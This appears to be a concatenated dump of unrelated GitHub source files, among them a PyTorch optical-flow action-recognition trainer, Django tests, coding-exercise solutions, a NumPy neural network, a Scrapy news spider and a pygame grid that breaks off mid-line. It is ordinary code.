current_block_frame,\r\n dtype=np.float32).reshape((1, 15, 60, 80))\r\n current_block_flow_x = np.array(\r\n current_block_flow_x,\r\n dtype=np.float32).reshape((1, 14, 30, 40))\r\n current_block_flow_y = np.array(\r\n current_block_flow_y,\r\n dtype=np.float32).reshape((1, 14, 30, 40))\r\n\r\n mean_frames += np.mean(current_block_frame)\r\n mean_flow_x += np.mean(current_block_flow_x)\r\n mean_flow_y += np.mean(current_block_flow_y)\r\n\r\n instances.append({\r\n \"frames\": current_block_frame,\r\n \"flow_x\": current_block_flow_x,\r\n \"flow_y\": current_block_flow_y\r\n })\r\n\r\n labels.append(\r\n CATEGORY_INDEX[video_frames[i_video][\"category\"]])\r\n\r\n current_block_frame = []\r\n current_block_flow_x = []\r\n current_block_flow_y = []\r\n\r\n mean_frames /= len(instances)\r\n mean_flow_x /= len(instances)\r\n mean_flow_y /= len(instances)\r\n\r\n self.mean = {\r\n \"frames\": mean_frames,\r\n \"flow_x\": mean_flow_x,\r\n \"flow_y\": mean_flow_y\r\n }\r\n\r\n labels = np.array(labels, dtype=np.uint8)\r\n\r\n return instances, labels\r\n\r\nclass CNNOpticalFlow(nn.Module):\r\n def __init__(self):\r\n super(CNNOpticalFlow, self).__init__()\r\n\r\n self.conv1_frame = nn.Sequential(\r\n nn.Conv3d(1, 16, kernel_size=(4, 5, 5)),\r\n nn.BatchNorm3d(16),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(1, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv2_frame = nn.Sequential(\r\n nn.Conv3d(16, 32, kernel_size=(4, 3, 3)),\r\n nn.BatchNorm3d(32),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv3_frame = nn.Sequential(\r\n nn.Conv3d(32, 64, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(64),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n\r\n self.conv1_flow_x = nn.Sequential(\r\n nn.Conv3d(1, 16, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(16),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(1, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv2_flow_x = nn.Sequential(\r\n nn.Conv3d(16, 32, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(32),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv3_flow_x = nn.Sequential(\r\n nn.Conv3d(32, 64, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(64),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n\r\n self.conv1_flow_y = nn.Sequential(\r\n nn.Conv3d(1, 16, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(16),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(1, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv2_flow_y = nn.Sequential(\r\n nn.Conv3d(16, 32, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(32),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv3_flow_y = nn.Sequential(\r\n nn.Conv3d(32, 64, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(64),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n\r\n self.fc1 = nn.Linear(3328, 128)\r\n self.dropfc1 = nn.Dropout(0.5)\r\n self.fc2 = nn.Linear(128, 6)\r\n\r\n def forward(self, frames, flow_x, flow_y):\r\n out_frames = self.conv1_frame(frames)\r\n out_frames = self.conv2_frame(out_frames)\r\n out_frames = self.conv3_frame(out_frames)\r\n out_frames = out_frames.view(out_frames.size(0), -1)\r\n\r\n out_flow_x = self.conv1_flow_x(flow_x)\r\n out_flow_x = self.conv2_flow_x(out_flow_x)\r\n out_flow_x = self.conv3_flow_x(out_flow_x)\r\n out_flow_x = out_flow_x.view(out_flow_x.size(0), -1)\r\n\r\n out_flow_y = self.conv1_flow_y(flow_y)\r\n out_flow_y = self.conv2_flow_y(out_flow_y)\r\n out_flow_y = self.conv3_flow_y(out_flow_y)\r\n out_flow_y = out_flow_y.view(out_flow_y.size(0), -1)\r\n\r\n out = torch.cat([out_frames, out_flow_x, out_flow_y], 1)\r\n out = self.fc1(out)\r\n out = nn.ReLU()(out)\r\n out = self.dropfc1(out)\r\n out = self.fc2(out)\r\n\r\n return out\r\n\r\ndef get_outputs(model, instances, flow=False, use_cuda=False):\r\n\r\n if flow:\r\n frames = Variable(instances[\"frames\"])\r\n flow_x = Variable(instances[\"flow_x\"])\r\n flow_y = Variable(instances[\"flow_y\"])\r\n\r\n if use_cuda:\r\n frames = frames.cuda()\r\n flow_x = flow_x.cuda()\r\n flow_y = flow_y.cuda()\r\n\r\n outputs = model(frames, flow_x, flow_y)\r\n\r\n else:\r\n instances = Variable(instances)\r\n if use_cuda:\r\n instances = instances.cuda()\r\n\r\n outputs = model(instances)\r\n\r\n return outputs\r\n\r\ndef evaluate(model, dataloader, flow=False, use_cuda=False):\r\n loss = 0\r\n correct = 0\r\n total = 0\r\n\r\n # Switch to evaluation mode.\r\n model.eval()\r\n\r\n for i, samples in enumerate(dataloader):\r\n outputs = get_outputs(model, samples[\"instance\"], flow=flow,\r\n use_cuda=use_cuda)\r\n \r\n labels = Variable(samples[\"label\"])\r\n if use_cuda:\r\n labels = labels.cuda()\r\n\r\n loss += nn.CrossEntropyLoss(size_average=False)(outputs, labels).data\r\n\r\n score, predicted = torch.max(outputs, 1)\r\n correct += (labels.data == predicted.data).sum()\r\n \r\n total += labels.size(0)\r\n\r\n acc = correct / total\r\n loss /= total\r\n\r\n return loss, acc\r\n\r\ndef train(model, num_epochs, train_set, test_set, lr=1e-3, batch_size=32,\r\n start_epoch=1, log=10, checkpoint_path=None, validate=True,\r\n resume=False, flow=False, use_cuda=False):\r\n\r\n train_loader = torch.utils.data.DataLoader(\r\n dataset=train_set, batch_size=batch_size, shuffle=True)\r\n\r\n # Must be sequential b/c this is used for evaluation.\r\n train_loader_sequential = torch.utils.data.DataLoader(\r\n dataset=train_set, batch_size=batch_size, shuffle=False)\r\n test_loader = torch.utils.data.DataLoader(\r\n dataset=test_set, batch_size=batch_size, shuffle=False)\r\n\r\n # Use Adam optimizer.\r\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\r\n train_accuracy = []\r\n test_accuracy = []\r\n # Record loss + accuracy.\r\n hist = []\r\n\r\n # Check if we are resuming training from a previous checkpoint.\r\n if resume:\r\n checkpoint = torch.load(os.path.join(\r\n checkpoint_path, \"model_epoch%d.chkpt\" % (start_epoch - 1)))\r\n\r\n model.load_state_dict(checkpoint[\"model\"])\r\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\r\n\r\n hist = checkpoint[\"hist\"]\r\n\r\n if use_cuda:\r\n model.cuda()\r\n criterion = nn.CrossEntropyLoss().cuda()\r\n else:\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n for epoch in range(start_epoch, start_epoch + num_epochs):\r\n # Switch to train mode.\r\n model.train()\r\n\r\n for i, samples in enumerate(train_loader):\r\n\r\n labels = Variable(samples[\"label\"])\r\n if use_cuda:\r\n labels = labels.cuda()\r\n\r\n # Zero out gradient from previous iteration.\r\n optimizer.zero_grad()\r\n\r\n # Forward, backward, and optimize.\r\n outputs = get_outputs(model, samples[\"instance\"], flow=flow,\r\n use_cuda=use_cuda)\r\n loss = criterion(outputs, labels)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if (i+1) % log == 0:\r\n print(\"epoch %d/%d, iteration %d/%d, loss: %s\"\r\n % (epoch, start_epoch + num_epochs - 1, i + 1,\r\n len(train_set) // batch_size, loss.data))\r\n \r\n # Get overall loss & accuracy on training set.\r\n train_loss, train_acc = evaluate(model, train_loader_sequential,\r\n flow=flow, use_cuda=use_cuda)\r\n\r\n if validate:\r\n # Get overall loss & accuracy on test set.\r\n test_loss, test_acc = evaluate(model, test_loader, flow=flow,\r\n use_cuda=use_cuda)\r\n\r\n print(\"epoch %d/%d, train_loss = %s, train_acc = %s, \"\r\n \"test_loss = %s, test_acc = %s\"\r\n % (epoch, start_epoch + num_epochs - 1,\r\n train_loss, train_acc, test_loss, test_acc))\r\n train_accuracy.append(train_acc)\r\n test_accuracy.append(test_acc)\r\n hist.append({\r\n \"train_loss\": train_loss, \"train_acc\": train_acc,\r\n \"test_loss\": test_loss, \"test_acc\": test_acc\r\n })\r\n else:\r\n print(\"epoch %d/%d, train_loss = %s, train_acc = %s\" % (epoch,\r\n start_epoch + num_epochs - 1, train_loss, train_acc))\r\n train_accuracy.append(train_acc)\r\n test_accuracy.append(test_acc)\r\n hist.append({\r\n \"train_loss\": train_loss, \"train_acc\": train_acc\r\n })\r\n\r\n optimizer.zero_grad()\r\n checkpoint = {\r\n \"model\": model.state_dict(),\r\n \"optimizer\": optimizer.state_dict(),\r\n \"hist\": hist\r\n }\r\n\r\n # Save checkpoint.\r\n torch.save(checkpoint, os.path.join(\r\n checkpoint_path, \"model_epoch%d.chkpt\" % epoch)) \r\n \r\n return train_accuracy,test_accuracy\r\nif __name__ == \"__main__\":\r\n # creating the datasets\r\n print(\"Making optical flow features for train dataset\")\r\n optflow_dataset(dataset=\"train\")\r\n print(\"Making raw_dataset features for train dataset\")\r\n raw_dataset(dataset=\"train\")\r\n print(\"Making optical flow features for test dataset\")\r\n optflow_dataset(dataset=\"test\")\r\n print(\"Making raw_dataset features for test dataset\")\r\n raw_dataset(dataset=\"test\")\r\n print(\"Making optical flow features for validation dataset\")\r\n optflow_dataset(dataset=\"validation\")\r\n print(\"Making raw_dataset features for validation dataset\")\r\n raw_dataset(dataset=\"validation\")\r\n # parsing the patha nd the location from the inputs given to the file\r\n parser = argparse.ArgumentParser(description=\"Block Frame&Flow ConvNet\")\r\n parser.add_argument(\"--dataset_dir\", type=str, default=\"data\",\r\n help=\"directory to dataset\")\r\n parser.add_argument(\"--batch_size\", type=int, default=64,\r\n help=\"batch size for training (default: 64)\")\r\n parser.add_argument(\"--num_epochs\", type=int, default=3,\r\n help=\"number of epochs to train (default: 3)\")\r\n parser.add_argument(\"--start_epoch\", type=int, default=1,\r\n help=\"start index of epoch (default: 1)\")\r\n parser.add_argument(\"--lr\", type=float, default=0.001,\r\n help=\"learning rate for training (default: 0.001)\")\r\n parser.add_argument(\"--log\", type=int, default=10,\r\n help=\"log frequency (default: 10 iterations)\")\r\n parser.add_argument(\"--cuda\", type=int, default=0,\r\n help=\"whether to use cuda (default: 0)\")\r\n args = parser.parse_args()\r\n # if passing the arguments via console change the hardcoded values to args.{variablename}\r\n dataset_dir = args.dataset_dir\r\n batch_size = 64\r\n num_epochs = 50\r\n start_epoch = 1\r\n lr = args.lr\r\n log_interval = args.log\r\n\r\n if args.cuda == 1:\r\n cuda = True\r\n else:\r\n cuda = False\r\n\r\n print(\"Loading dataset\")\r\n train_set = opticalflowdataset(dataset_dir, \"train_flow\")\r\n test_set = opticalflowdataset(dataset_dir, \"test_flow\")\r\n train_set.zero_center(train_set.mean)\r\n test_set.zero_center(train_set.mean)\r\n \r\n # Create model and optimizer.\r\n model = CNNOpticalFlow()\r\n\r\n if start_epoch > 1:\r\n resume = True\r\n else:\r\n resume = False\r\n\r\n # Create directory for storing checkpoints.\r\n os.makedirs(os.path.join(dataset_dir, \"cnn_optical_flow_model_chckpts\"),\r\n exist_ok=True)\r\n\r\n print(\"Start training\")\r\n history,test_accuracy_val = train(model, num_epochs, train_set, test_set, lr=lr, batch_size=batch_size,\r\n start_epoch=start_epoch, log=log_interval, \r\n checkpoint_path=os.path.join(dataset_dir, \"cnn_optical_flow_model_chckpts\"),\r\n validate=True, resume=resume, flow=True, use_cuda=cuda)\r\n print(history)\r\n print(test_accuracy_val)\r\n \r\n # plotting the training and the test curve\r\n epochs = range(1,num_epochs + 1)\r\n plt.plot(epochs, history, 'g')\r\n plt.title('Training accuracy vs epoc')\r\n plt.xlabel('Epochs')\r\n plt.ylabel('accuracy')\r\n plt.show()\r\n epochs = range(1,num_epochs + 1)\r\n plt.plot(epochs, test_accuracy_val, 'r')\r\n plt.title('Test accurcy vs epoch')\r\n plt.xlabel('Epochs')\r\n plt.ylabel('accuracy')\r\n \r\n # evaluation\r\n dataset_dir = args.dataset_dir\r\n \r\n # update the model name to evaluate the data on the trained model\r\n model_dir = \"data/cnn_optical_flow_model_chckpts/model_epoch40.chkpt\"\r\n\r\n print(\"Loading validation dataset\")\r\n train_dataset = opticalflowdataset(dataset_dir, \"validation\")\r\n video_frames = pickle.load(open(\"data/validation.p\", \"rb\"))\r\n video_flows = pickle.load(open(\"data/validation_flow.p\", \"rb\"))\r\n\r\n print(\"Loading the trained model\")\r\n chkpt = torch.load(model_dir, map_location=lambda storage, loc: storage)\r\n model = CNNOpticalFlow()\r\n model.load_state_dict(chkpt[\"model\"])\r\n\r\n # Number of correct classified videos.\r\n correct = 0\r\n\r\n model.eval()\r\n for i in range(len(video_frames)):\r\n frames = video_frames[i][\"frames\"]\r\n flow_x = [0] + video_flows[i][\"flow_x\"]\r\n flow_y = [0] + video_flows[i][\"flow_y\"]\r\n\r\n # Class probabilities.\r\n P = np.zeros(6, dtype=np.float32)\r\n\r\n current_block_frame = []\r\n current_block_flow_x = []\r\n current_block_flow_y = []\r\n cnt = 0\r\n\r\n for i_frame in range(len(frames)):\r\n current_block_frame.append(frames[i_frame])\r\n\r\n if i_frame % 15 > 0:\r\n current_block_flow_x.append(flow_x[i_frame])\r\n current_block_flow_y.append(flow_y[i_frame])\r\n\r\n if (i_frame + 1) % 15 == 0:\r\n cnt += 1\r\n\r\n current_block_frame = np.array(\r\n current_block_frame,\r\n dtype=np.float32).reshape((1, 15, 60, 80))\r\n\r\n current_block_flow_x = np.array(\r\n current_block_flow_x,\r\n dtype=np.float32).reshape((1, 14, 30, 40))\r\n\r\n current_block_flow_y = np.array(\r\n current_block_flow_y,\r\n dtype=np.float32).reshape((1, 14, 30, 40))\r\n\r\n current_block_frame -= train_dataset.mean[\"frames\"]\r\n current_block_flow_x -= train_dataset.mean[\"flow_x\"]\r\n current_block_flow_y -= train_dataset.mean[\"flow_y\"]\r\n\r\n tensor_frames = torch.from_numpy(current_block_frame)\r\n tensor_flow_x = torch.from_numpy(current_block_flow_x)\r\n tensor_flow_y = torch.from_numpy(current_block_flow_y)\r\n\r\n instance_frames = Variable(tensor_frames.unsqueeze(0))\r\n instance_flow_x = Variable(tensor_flow_x.unsqueeze(0))\r\n instance_flow_y = Variable(tensor_flow_y.unsqueeze(0))\r\n\r\n score = model(instance_frames, instance_flow_x,\r\n instance_flow_y).data[0].numpy()\r\n\r\n score -= np.max(score)\r\n p = np.e**score / np.sum(np.e**score)\r\n P += p\r\n\r\n current_block_frame = []\r\n current_block_flow_x = []\r\n current_block_flow_y = []\r\n\r\n P /= cnt\r\n pred = CATEGORIES[np.argmax(P)]\r\n if pred == video_frames[i][\"category\"]:\r\n correct += 1\r\n\r\n if i > 0 and i % 10 == 0:\r\n print(\"Done %d/%d videos\" % (i, len(video_frames)))\r\n\r\n print(\"%d/%d correct\" % (correct, len(video_frames)))\r\n print(\"Accuracy: %.9f\" % (correct / len(video_frames)))\r\n\r\n","repo_name":"nb20593/Action-Recogonition","sub_path":"main/Action_Recognition.py","file_name":"Action_Recognition.py","file_ext":"py","file_size_in_byte":26360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43718578524","text":"from django.test import TestCase, Client\nfrom django.urls import reverse\nimport json\n\nfrom app.views import (\n most_repeated_letter,\n save_text_data_into_database\n)\nfrom webservice.views import (\n random_line\n)\nfrom app.models import TextModel\n\nclass TestView(TestCase):\n \n def setUp(self):\n self.client = Client()\n self.list_text_line_url = reverse(\"list_text_line\")\n self.filename = \"textfile_directory/my_text.txt\"\n self.text_data = {\n \"line_text\": \"The entire reading component must be written in English\", \n }\n self.created_text_line = TextModel.objects.create(\n text_line=\"This is a random text for tests purposes.\",\n most_frequency_character=\"o\",\n )\n \n # def test_counting_letters(self):\n # text = \"This is a random text for tests purposes.\"\n # counted_letters = counting_letters(text)\n # self.assertIsInstance(counted_letters, dict)\n\n def test_save_text_into_database_success(self):\n text_data_info = save_text_data_into_database(self.text_data)\n self.assertIsInstance(text_data_info, TextModel)\n\n def test_add_another_line(self):\n response = self.client.get(\n reverse(\"add_another_line\"),\n data={\n \"line\": \"Random text line\",\n \"most_frequency_character\": \"t\",\n },\n content_type='application/json',\n HTTP_X_REQUESTED_WITH='XMLHttpRequest'\n )\n \n self.assertEquals(response.status_code, 200)\n self.assertTrue(response, \"application/json\")\n\n def test_list_text_line_list_GET(self):\n response = self.client.get(self.list_text_line_url)\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, \"app/index.html\")\n","repo_name":"giovannamascarenhas/cocus-challenge","sub_path":"app/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8547829211","text":"from home.models import WelcomeCard\nfrom rest_framework import serializers\n\n\nclass WelcomeCardSerializer(serializers.ModelSerializer):\n class Meta:\n model = WelcomeCard\n fields = [\n \"title\",\n \"description\",\n \"tag_txt\",\n \"created_at\",\n \"updated_at\",\n \"button_src\",\n \"button_txt\",\n \"image\",\n \"design_type\",\n \"category\",\n \"col\",\n \"status\",\n ]\n","repo_name":"prography/snowflake-backend","sub_path":"home/serializers/welcome_card.py","file_name":"welcome_card.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"13057832191","text":"\nword = 'Архангельск'\nprint(word[-1])\n\nnew_word = word.lower()\ncount = 0\nfor i in new_word:\n if i == 'а':\n count += 1\nprint(count)\n\n\nword = \"Архангельск\"\nvocab = [\"а\", \"е\", \"и\", \"о\", \"у\", \"э\", \"ю\", \"я\", \"ы\"]\ncount = 0\nfor i in word.lower():\n for j in vocab:\n if i == j:\n count += 1\nprint(count)\n\n\nsentence = 'Мы приехали в гости'\nprint(len(sentence.split()))\n\nfor i in sentence.split():\n print(i[0])\n\n\nnew_sentence = sentence.replace(' ','')\nprint(int(len(new_sentence)/len(sentence.split())))\n","repo_name":"demidenko-svetlana/lesson2","sub_path":"practice9.py","file_name":"practice9.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13442937878","text":"def init():\n N, M, K = map(int, input().split())\n\n fireball_list = []\n for _ in range(M):\n temp = list(map(int, input().split()))\n fireball_list.append(temp)\n\n return N, M, K, fireball_list\n \n\nN, M, K, fireball_list = init()\ngrid = [[[] for _ in range(N)] for _ in range(N)]\n\ndr = [-1, -1, 0, 1, 1, 1, 0, -1]\ndc = [0, 1, 1, 1, 0, -1, -1, -1]\n\nfor _ in range(K):\n while fireball_list:\n r, c, m, s, d = fireball_list.pop(0)\n new_r = (r + s * dr[d]) % N\n new_c = (c + s * dc[d]) % N\n grid[new_r][new_c].append([m, s, d])\n\n for r in range(N):\n for c in range(N):\n if len(grid[r][c]) > 1:\n sum_m, sum_s, odd_cnt, even_cnt, cnt = 0, 0, 0, 0, len(grid[r][c])\n \n while grid[r][c]:\n m, s, d = grid[r][c].pop(0)\n sum_m += m\n sum_s += s\n\n if d % 2 == 0:\n even_cnt += 1\n else:\n odd_cnt += 1\n\n if odd_cnt == cnt or even_cnt == cnt:\n direction = [0, 2, 4, 6]\n else:\n direction = [1, 3, 5, 7]\n \n if sum_m // 5:\n for d in direction:\n fireball_list.append([r, c, sum_m//5, sum_s//cnt, d])\n \n if len(grid[r][c]) == 1:\n fireball_list.append([r, c] + grid[r][c].pop(0))\n\nprint(sum(ball[2] for ball in fireball_list))","repo_name":"dhleekr/algorithm","sub_path":"ss/20056.py","file_name":"20056.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34610859920","text":"import math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\np=0\r\nm=0\r\nn=0\r\na=int(input())\r\nx = list(map(int,input().strip().split()))[:a] \r\nfor i in range(0,a):\r\n if x[i]>0:\r\n p=p+1\r\n elif x[i]==0:\r\n n=n+1\r\n else:\r\n m=m+1\r\nprint(p/a)\r\nprint(m/a)\r\nprint(n/a)\r\n","repo_name":"triquetrx/HackerRank","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71080707752","text":"# longest substring without repeating characters\r\n# input asddfghjill\r\n# output dfghjil\r\n# input fedoret\r\n# output fedor\r\ndef find_longest_substring(inputstring) :\r\n if inputstring is None :\r\n return \"\"\r\n startindex=0\r\n movingindex=0\r\n longestsubstring=\"\"\r\n stringset=[]\r\n for i in range(0,len(inputstring)):\r\n movingindex+=1\r\n \r\n if inputstring[i] not in stringset :\r\n stringset.append(inputstring[i])\r\n if(len(stringset)>len(longestsubstring)):\r\n longestsubstring=inputstring[startindex:movingindex]\r\n continue\r\n while startindex 0 else [0,1,0] if result == 0 else [0,0,1] for result in results])\n\n return (X, y)\n\n def loadData(self, trainData, testData):\n self.Xtrain, self.ytrain = self.prepareData(trainData)\n self.Xtest, self.ytest = self.prepareData(testData)\n np.random.seed(1)\n # Randomly initializing weights\n self.w1 = 2 * np.random.random((10, 29)) - 1\n self.w2 = 2 * np.random.random((10, 10)) - 1\n self.w3 = 2 * np.random.random((3, 10)) - 1\n\n def fit(self, k=10, type='nonlinear',iterations=1000):\n # Iterating over training samples\n print(\"Training...\")\n for i in tqdm(range(iterations)): #loading bar\n for X, y in zip(self.Xtrain ,self.ytrain):\n # Feedforward\n a1, a2, a3, a4 = self.feedforward(X,type)\n \n # Backpropagation\n d2, d3, d4 = self.backpropagation(a2, a3, a4, y)\n\n #TODO:to be assigned\n #self.w1 += np.transpose(np.dot(np.transpose(np.asmatrix(a1)), np.asmatrix(d2)))\n #self.w2 += np.transpose(np.dot(np.transpose(np.asmatrix(a2)), np.asmatrix(d3)))\n #self.w3 += np.transpose(np.dot(np.transpose(np.asmatrix(a3)), np.asmatrix(d4)))\n\n if k%2==0:\n self.w1 += np.nan_to_num(np.transpose(np.dot(np.transpose(np.asmatrix(a1)), np.asmatrix(d2))))\n self.w2 += np.nan_to_num(np.transpose(np.dot(np.transpose(np.asmatrix(a2)), np.asmatrix(d3))))\n self.w3 += np.nan_to_num(np.transpose(np.dot(np.transpose(np.asmatrix(a3)), np.asmatrix(d4))))\n else: \n self.w1 += np.transpose(np.dot(np.transpose(np.asmatrix(a1)), np.asmatrix(d2)))\n self.w2 += np.transpose(np.dot(np.transpose(np.asmatrix(a2)), np.asmatrix(d3)))\n self.w3 += np.transpose(np.dot(np.transpose(np.asmatrix(a3)), np.asmatrix(d4)))\n print(\"\\nTraining complete!\\n\")\n \n # Feedforward to find a2, a3, a4\n def feedforward(self, X, type='nonlinear'):\n #activation f(x) = sigmoid(x)\n if type == 'nonlinear':\n a1 = X\n z2 = np.dot(self.w1, a1)\n a2 = self.sigmoid(z2)\n z3 = np.dot(self.w2, a2)\n a3 = self.sigmoid(z3)\n z4 = np.dot(self.w3, a3)\n a4 = self.sigmoid(z4)\n elif type == 'linear': #activation f(x) = Wx+b\n a1 = X\n a2 = np.dot(self.w1, a1)\n a3 = np.dot(self.w2, a2)\n a4 = np.dot(self.w3, a3)\n\n (a1,a2,a3,a4) = (np.nan_to_num(a1), np.nan_to_num(a2), np.nan_to_num(a3), np.nan_to_num(a4))\n return (a1, a2, a3, a4)\n\n # Backpropagation to find d2, d3, d4\n def backpropagation(self, a2, a3, a4, y):\n d4 = np.subtract(a4, y)\n i3 = np.ones(a3.shape)\n i2 = np.ones(a2.shape)\n\n #TODO: to be assigned\n #gz3 = np.dot(a3, i3-a3)\n #gz2 = np.dot(a2, i2-a2)\n #theta3 = np.nan_to_num(np.dot(np.transpose(self.w3), d4))\n #d3 = np.nan_to_num(np.dot(theta3, gz3)) \n #theta2 = np.nan_to_num(np.dot(np.transpose(self.w2), d3))\n #d2 = np.nan_to_num(np.dot(theta2, gz2)) \n\n gz3 = np.nan_to_num(np.dot(a3, i3-a3))\n gz2 = np.nan_to_num(np.dot(a2, i2-a2))\n\n theta3 = np.nan_to_num(np.dot(np.transpose(self.w3), d4))\n d3 = np.nan_to_num(np.dot(theta3, gz3)) \n \n theta2 = np.nan_to_num(np.dot(np.transpose(self.w2), d3))\n d2 = np.nan_to_num(np.dot(theta2, gz2))\n \n return (d2, d3, d4)\n\n def predict(self, X, type='nonlinear'):\n predictions = []\n for sample in X:\n prediction = self.feedforward(sample,type)[3]\n predictions.append(prediction)\n return predictions\n\n def calculateAccuracy(self, predictions, y):\n accuracy = 0\n for prediction, output in zip(predictions, y):\n l = np.subtract(prediction, output)\n accuracy += np.count_nonzero(l == 0) / len(prediction)\n accuracy /= len(predictions)\n return accuracy\n\n # Sigmoid activation function: NON LINEAR\n def sigmoid(self, x):\n return 1 / (1 + np.exp(-x))\n\n ","repo_name":"angelica-thd/PatternRecognitionV2","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":4762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73715555432","text":"# -*- coding: utf-8 -*-\nimport re\nimport scrapy\nfrom fagaiwei.items import FagaiweiItem\nfrom fagaiwei.keyword_others import keyword\nfrom fagaiwei.settings import session, NewsItemInfo\n\n\nclass ZjzxSpider(scrapy.Spider):\n # 中金在线\n name = 'zhongjinzaixian'\n allowed_domains = ['cnfol.com']\n start_urls = ['http://news.cnfol.com/', # 财经\n 'http://stock.cnfol.com/', # 股票\n 'http://fund.cnfol.com/', # 基金\n 'http://money.cnfol.com/', # 理财\n 'http://xg.stock.cnfol.com/' # 新股\n ]\n\n def parse(self, response):\n url_list = response.xpath(\n '//div[@class=\"mBlock\"]/div[@class=\"artBlock\"]/a/@href|//*[@id=\"artList\"]/div/a/@href').extract()\n for url in url_list:\n result = session.query(NewsItemInfo).filter_by(url=url, web_id=29).count()\n if result:\n # print(\"{} 存在\".format(url))\n pass\n else:\n yield scrapy.Request(url, callback=self.process_detail, meta={'web': response.url})\n\n def process_detail(self, response):\n item = FagaiweiItem()\n item['web_id'] = 29\n item['url'] = response.url\n item['title'] = ''.join(\n response.xpath('//div[contains(@class,\"artMain mBlock\")]/h3[@class=\"artTitle\"]/text()').extract())\n item['web'] = response.meta.get('web')\n # item['keyword'] = ''\n news_about = response.xpath('//div[@class=\"artDes\"]/span/text()').extract()\n webname = news_about[1].split(':')[1]\n if not webname:\n webname = response.xpath('//div[@class=\"artDes\"]/span[2]/a/text()').extract_first(default='中金在线')\n item['webname'] = webname\n item['pub_time'] = news_about[0]\n content = '\\n'.join(response.xpath('//div[@class=\"Article\"]/text() | \\\n //div[@class=\"Article\"]/span/text() | \\\n //div[@class=\"Article\"]/a/text()').extract())\n content = re.sub('\\u3000|\\r\\n|\\n\\n', '', content)\n item['content'] = content\n item[\"keyword\"] = keyword.get_keyword(item[\"content\"])\n\n yield item\n","repo_name":"KKtoNN/python_spider","sub_path":"fagaiwei/fagaiwei/spiders/29zjzx.py","file_name":"29zjzx.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"1192742531","text":"import pygame\n\n\nclass MainGui:\n def __init__(self):\n pygame.init()\n self.WHITE = (250, 250, 250)\n self.RED = (250, 0, 0)\n self.BLACK = (0, 0, 0)\n self.CELL_SIZE = 19\n self.LINE_SIZE = 1\n self.CELLS_WIDE = 50\n self.CELLS_HIGH = 20\n self.LINES_WIDE = self.CELLS_WIDE + self.LINE_SIZE\n self.LINES_HIGH = self.CELLS_HIGH + self.LINE_SIZE\n self.WIDTH = self.LINES_WIDE + self.CELLS_WIDE * self.CELL_SIZE\n self.HEIGHT = self.LINES_HIGH + self.CELLS_HIGH * self.CELL_SIZE\n self.screen = pygame.display.set_mode((self.WIDTH, self.HEIGHT))\n\n def draw_grid(self):\n for offset in self.get_offset(self.LINES_HIGH):\n pygame.draw.line(self.screen, self.WHITE, (0, offset), (self.WIDTH, offset))\n for offset in self.get_offset(self.LINES_WIDE):\n pygame.draw.line(self.screen, self.WHITE, (offset, 0), (offset, self.HEIGHT))\n pygame.display.flip()\n\n def get_offset(self, size):\n for i in range(size):\n yield i * (self.CELL_SIZE + self.LINE_SIZE)\n\n def fill_on_position(self, x, y):\n start = lambda a: a * (self.CELL_SIZE + self.LINE_SIZE) + self.LINE_SIZE\n start_x = start(x)\n start_y = start(y)\n square = pygame.Rect(start_x, start_y, self.CELL_SIZE, self.CELL_SIZE)\n pygame.draw.rect(self.screen, self.RED, square)\n pygame.display.update(square)\n\n def reset_screen(self):\n pygame.draw.rect(self.screen, self.BLACK, pygame.Rect(0, 0, self.WIDTH, 